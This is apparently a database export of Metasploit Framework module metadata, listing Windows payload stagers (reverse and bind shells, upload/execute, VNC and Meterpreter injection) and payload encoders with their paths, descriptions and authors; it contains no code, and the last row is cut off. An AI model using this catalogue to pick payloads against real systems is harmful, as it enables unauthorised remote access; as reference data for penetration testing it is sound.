2248,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/shell/bind_nonx_tcp","payload/windows/shell/bind_nonx_tcp","Windows Command Shell, Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , spoonm , vlad902 "
2249,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/shell/bind_tcp","payload/windows/shell/bind_tcp","Windows Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , spoonm "
2250,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/shell/bind_tcp_rc4","payload/windows/shell/bind_tcp_rc4","Windows Command Shell, Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , mihi, sf , skape , spoonm "
2251,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/shell/find_tag","payload/windows/shell/find_tag","Windows Command Shell, Find Tag Ordinal Stager",300,"Use an established connection, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , skape , spoonm "
2252,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_http.rb","payload","windows/shell/reverse_http","payload/windows/shell/reverse_http","Windows Command Shell, Reverse HTTP Stager",300,"Tunnel communication over HTTP, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , spoonm "
2253,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_http.rb","payload","windows/shell/reverse_ipv6_http","payload/windows/shell/reverse_ipv6_http","Windows Command Shell, Reverse HTTP Stager (IPv6)",300,"Tunnel communication over HTTP and IPv6, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , spoonm "
2254,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/shell/reverse_ipv6_tcp","payload/windows/shell/reverse_ipv6_tcp","Windows Command Shell, Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , spoonm "
2255,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/shell/reverse_nonx_tcp","payload/windows/shell/reverse_nonx_tcp","Windows Command Shell, Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , spoonm , vlad902 "
2256,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/shell/reverse_ord_tcp","payload/windows/shell/reverse_ord_tcp","Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , spoonm "
2257,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/shell/reverse_tcp","payload/windows/shell/reverse_tcp","Windows Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , spoonm "
2258,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/shell/reverse_tcp_allports","payload/windows/shell/reverse_tcp_allports","Windows Command Shell, Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , spoonm "
2259,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/shell/reverse_tcp_dns","payload/windows/shell/reverse_tcp_dns","Windows Command Shell, Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , spoonm "
2260,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/shell/reverse_tcp_rc4","payload/windows/shell/reverse_tcp_rc4","Windows Command Shell, Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , mihi, sf , skape , spoonm "
2261,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/shell/reverse_tcp_rc4_dns","payload/windows/shell/reverse_tcp_rc4_dns","Windows Command Shell, Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Spawn a piped command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"RageLtMan, hdm , mihi, sf , skape , spoonm "
2262,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/shell_bind_tcp.rb","payload","windows/shell_bind_tcp","payload/windows/shell_bind_tcp","Windows Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"sf , vlad902 "
2263,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb","payload","windows/shell_bind_tcp_xpfw","payload/windows/shell_bind_tcp_xpfw","Windows Disable Windows ICF, Command Shell, Bind TCP Inline",300,"Disable the Windows ICF, then listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Lin0xx "
2264,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/shell_reverse_tcp.rb","payload","windows/shell_reverse_tcp","payload/windows/shell_reverse_tcp","Windows Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"sf , vlad902 "
2265,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/speak_pwned.rb","payload","windows/speak_pwned","payload/windows/speak_pwned","Windows Speech API - Say ""You Got Pwned!""",300,"Causes the target to say ""You Got Pwned"" via the Windows Speech API","BSD License","f",,,,,"t",,"Berend-Jan ""SkyLined"" Wever "
2266,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/upexec/bind_ipv6_tcp","payload/windows/upexec/bind_ipv6_tcp","Windows Upload/Execute, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , vlad902 "
2267,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/upexec/bind_nonx_tcp","payload/windows/upexec/bind_nonx_tcp","Windows Upload/Execute, Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , vlad902 "
2268,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/upexec/bind_tcp","payload/windows/upexec/bind_tcp","Windows Upload/Execute, Bind TCP Stager",300,"Listen for a connection, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , vlad902 "
2269,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/upexec/bind_tcp_rc4","payload/windows/upexec/bind_tcp_rc4","Windows Upload/Execute, Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , mihi, sf , skape , vlad902 "
2270,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/upexec/find_tag","payload/windows/upexec/find_tag","Windows Upload/Execute, Find Tag Ordinal Stager",300,"Use an established connection, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , skape , vlad902 "
2271,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_http.rb","payload","windows/upexec/reverse_http","payload/windows/upexec/reverse_http","Windows Upload/Execute, Reverse HTTP Stager",300,"Tunnel communication over HTTP, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , vlad902 "
2272,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_http.rb","payload","windows/upexec/reverse_ipv6_http","payload/windows/upexec/reverse_ipv6_http","Windows Upload/Execute, Reverse HTTP Stager (IPv6)",300,"Tunnel communication over HTTP and IPv6, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , vlad902 "
2273,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/upexec/reverse_ipv6_tcp","payload/windows/upexec/reverse_ipv6_tcp","Windows Upload/Execute, Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , vlad902 "
2274,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/upexec/reverse_nonx_tcp","payload/windows/upexec/reverse_nonx_tcp","Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , vlad902 "
2275,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/upexec/reverse_ord_tcp","payload/windows/upexec/reverse_ord_tcp","Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf , spoonm , vlad902 "
2276,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/upexec/reverse_tcp","payload/windows/upexec/reverse_tcp","Windows Upload/Execute, Reverse TCP Stager",300,"Connect back to the attacker, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , vlad902 "
2277,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/upexec/reverse_tcp_allports","payload/windows/upexec/reverse_tcp_allports","Windows Upload/Execute, Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , vlad902 "
2278,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/upexec/reverse_tcp_dns","payload/windows/upexec/reverse_tcp_dns","Windows Upload/Execute, Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , sf , skape , vlad902 "
2279,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/upexec/reverse_tcp_rc4","payload/windows/upexec/reverse_tcp_rc4","Windows Upload/Execute, Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , mihi, sf , skape , vlad902 "
2280,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/upexec/reverse_tcp_rc4_dns","payload/windows/upexec/reverse_tcp_rc4_dns","Windows Upload/Execute, Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Uploads an executable and runs it (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"RageLtMan, hdm , mihi, sf , skape , vlad902 "
2281,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/vncinject/bind_ipv6_tcp","payload/windows/vncinject/bind_ipv6_tcp","VNC Server (Reflective Injection), Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2282,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/vncinject/bind_nonx_tcp","payload/windows/vncinject/bind_nonx_tcp","VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , vlad902 "
2283,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/vncinject/bind_tcp","payload/windows/vncinject/bind_tcp","VNC Server (Reflective Injection), Bind TCP Stager",300,"Listen for a connection, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2284,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/vncinject/bind_tcp_rc4","payload/windows/vncinject/bind_tcp_rc4","VNC Server (Reflective Injection), Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , mihi, sf , skape "
2285,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/vncinject/find_tag","payload/windows/vncinject/find_tag","VNC Server (Reflective Injection), Find Tag Ordinal Stager",300,"Use an established connection, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , skape "
2286,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_http.rb","payload","windows/vncinject/reverse_http","payload/windows/vncinject/reverse_http","VNC Server (Reflective Injection), Reverse HTTP Stager",300,"Tunnel communication over HTTP, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf "
2287,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_http.rb","payload","windows/vncinject/reverse_ipv6_http","payload/windows/vncinject/reverse_ipv6_http","VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)",300,"Tunnel communication over HTTP and IPv6, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf "
2288,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/vncinject/reverse_ipv6_tcp","payload/windows/vncinject/reverse_ipv6_tcp","VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape "
2289,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/vncinject/reverse_nonx_tcp","payload/windows/vncinject/reverse_nonx_tcp","VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , vlad902 " 2290,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/vncinject/reverse_ord_tcp","payload/windows/vncinject/reverse_ord_tcp","VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , spoonm " 2291,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/vncinject/reverse_tcp","payload/windows/vncinject/reverse_tcp","VNC Server (Reflective Injection), Reverse TCP Stager",300,"Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2292,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/vncinject/reverse_tcp_allports","payload/windows/vncinject/reverse_tcp_allports","VNC Server (Reflective Injection), Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2293,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/vncinject/reverse_tcp_dns","payload/windows/vncinject/reverse_tcp_dns","VNC Server (Reflective Injection), Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2294,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/vncinject/reverse_tcp_rc4","payload/windows/vncinject/reverse_tcp_rc4","VNC Server (Reflective Injection), Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , mihi, sf , skape " 2295,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/vncinject/reverse_tcp_rc4_dns","payload/windows/vncinject/reverse_tcp_rc4_dns","VNC Server (Reflective Injection), Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","RageLtMan, hdm , mihi, sf , skape " 2296,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/x64/exec.rb","payload","windows/x64/exec","payload/windows/x64/exec","Windows x64 Execute Command",300,"Execute an arbitrary command (Windows x64)","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2297,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/x64/loadlibrary.rb","payload","windows/x64/loadlibrary","payload/windows/x64/loadlibrary","Windows x64 LoadLibrary 
Path",300,"Load an arbitrary x64 library path","Metasploit Framework License (BSD)","f",,,,,"t",,"scriptjunkie, sf " 2298,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/x64/bind_tcp.rb","payload","windows/x64/meterpreter/bind_tcp","payload/windows/x64/meterpreter/bind_tcp","Windows x64 Meterpreter, Windows x64 Bind TCP Stager",300,"Listen for a connection (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf " 2299,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/x64/reverse_tcp.rb","payload","windows/x64/meterpreter/reverse_tcp","payload/windows/x64/meterpreter/reverse_tcp","Windows x64 Meterpreter, Windows x64 Reverse TCP Stager",300,"Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf " 2300,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/x64/bind_tcp.rb","payload","windows/x64/shell/bind_tcp","payload/windows/x64/shell/bind_tcp","Windows x64 Command Shell, Windows x64 Bind TCP Stager",300,"Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf " 2301,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/x64/reverse_tcp.rb","payload","windows/x64/shell/reverse_tcp","payload/windows/x64/shell/reverse_tcp","Windows x64 Command Shell, Windows x64 Reverse TCP Stager",300,"Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf " 2302,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/x64/shell_bind_tcp.rb","payload","windows/x64/shell_bind_tcp","payload/windows/x64/shell_bind_tcp","Windows x64 Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell (Windows x64)","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2303,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb","payload","windows/x64/shell_reverse_tcp","payload/windows/x64/shell_reverse_tcp","Windows x64 Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell (Windows x64)","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2304,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/x64/bind_tcp.rb","payload","windows/x64/vncinject/bind_tcp","payload/windows/x64/vncinject/bind_tcp","Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager",300,"Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf " 2305,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/x64/reverse_tcp.rb","payload","windows/x64/vncinject/reverse_tcp","payload/windows/x64/vncinject/reverse_tcp","Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager",300,"Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf " 2306,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/cmd/generic_sh.rb","encoder","cmd/generic_sh","encoder/cmd/generic_sh","Generic Shell Variable Substitution Command Encoder",400,"This encoder uses standard Bourne shell variable substitution tricks to 
avoid commonly restricted characters.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2307,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/cmd/ifs.rb","encoder","cmd/ifs","encoder/cmd/ifs","Generic ${IFS} Substitution Command Encoder",100,"This encoder uses standard Bourne shell variable substitution to avoid spaces without being overly fancy.","Metasploit Framework License (BSD)","f",,,,,"t",,"egypt " 2308,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/cmd/printf_php_mq.rb","encoder","cmd/printf_php_mq","encoder/cmd/printf_php_mq","printf(1) via PHP magic_quotes Utility Command Encoder",0,"This encoder uses the printf(1) utility to avoid restricted characters. Some shell variable substituion may also be used if needed symbols are blacklisted. Some characters are intentionally left unescaped since it is assummed that PHP with magic_quotes_gpc enabled will escape them during request handling.","Metasploit Framework License (BSD)","f",,,,,"t",,"jduck " 2309,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/generic/none.rb","encoder","generic/none","encoder/generic/none","The ""none"" Encoder",300,"This ""encoder"" does not transform the payload in any way.","Metasploit Framework License (BSD)","f",,,,,"t",,"spoonm " 2310,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/mipsbe/longxor.rb","encoder","mipsbe/longxor","encoder/mipsbe/longxor","XOR Encoder",300,"Mips Web server exploit friendly xor encoder","Metasploit Framework License (BSD)","f",,,,,"t",,"Julien Tinnes " 2311,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/mipsle/longxor.rb","encoder","mipsle/longxor","encoder/mipsle/longxor","XOR Encoder",300,"Mips Web server exploit friendly xor encoder","Metasploit Framework License (BSD)","f",,,,,"t",,"Julien Tinnes " 2312,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/php/base64.rb","encoder","php/base64","encoder/php/base64","PHP Base64 Encoder",500,"This encoder returns a base64 string encapsulated in eval(base64_decode()), increasing the size by a bit more than one third.","BSD License","f",,,,,"t",,"egypt " 2313,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/ppc/longxor.rb","encoder","ppc/longxor","encoder/ppc/longxor","PPC LongXOR Encoder",300,"This encoder is ghandi's PPC dword xor encoder with some size tweaks by HDM.","Metasploit Framework License (BSD)","f",,,,,"t",,"ddz , hdm " 2314,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/ppc/longxor_tag.rb","encoder","ppc/longxor_tag","encoder/ppc/longxor_tag","PPC LongXOR Encoder",300,"This encoder is ghandi's PPC dword xor encoder but uses a tag-based terminator rather than a length.","Metasploit Framework License (BSD)","f",,,,,"t",,"ddz , hdm " 2315,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/sparc/longxor_tag.rb","encoder","sparc/longxor_tag","encoder/sparc/longxor_tag","SPARC DWORD XOR Encoder",300,"This encoder is optyx's 48-byte SPARC encoder with some tweaks.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , optyx " 2316,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x64/xor.rb","encoder","x64/xor","encoder/x64/xor","XOR Encoder",300,"An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2317,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/alpha_mixed.rb","encoder","x86/alpha_mixed","encoder/x86/alpha_mixed","Alpha2 Alphanumeric Mixedcase Encoder",100,"Encodes payloads as alphanumeric mixedcase text. 
This encoder uses SkyLined's Alpha2 encoding suite.","BSD License","f",,,,,"t",,"pusscat , skylined " 2318,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/alpha_upper.rb","encoder","x86/alpha_upper","encoder/x86/alpha_upper","Alpha2 Alphanumeric Uppercase Encoder",100,"Encodes payloads as alphanumeric uppercase text. This encoder uses SkyLined's Alpha2 encoding suite.","BSD License","f",,,,,"t",,"pusscat , skylined " 2319,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/avoid_underscore_tolower.rb","encoder","x86/avoid_underscore_tolower","encoder/x86/avoid_underscore_tolower","Avoid underscore/tolower",0,"Underscore/tolower Safe Encoder used to exploit CVE-2012-2329. It is a modified version of the 'Avoid UTF8/tolower' encoder by skape. Please check the documentation of the skape encoder before using it. As the original, this encoder expects ECX pointing to the start of the encoded payload. Also BufferOffset must be provided if needed. 
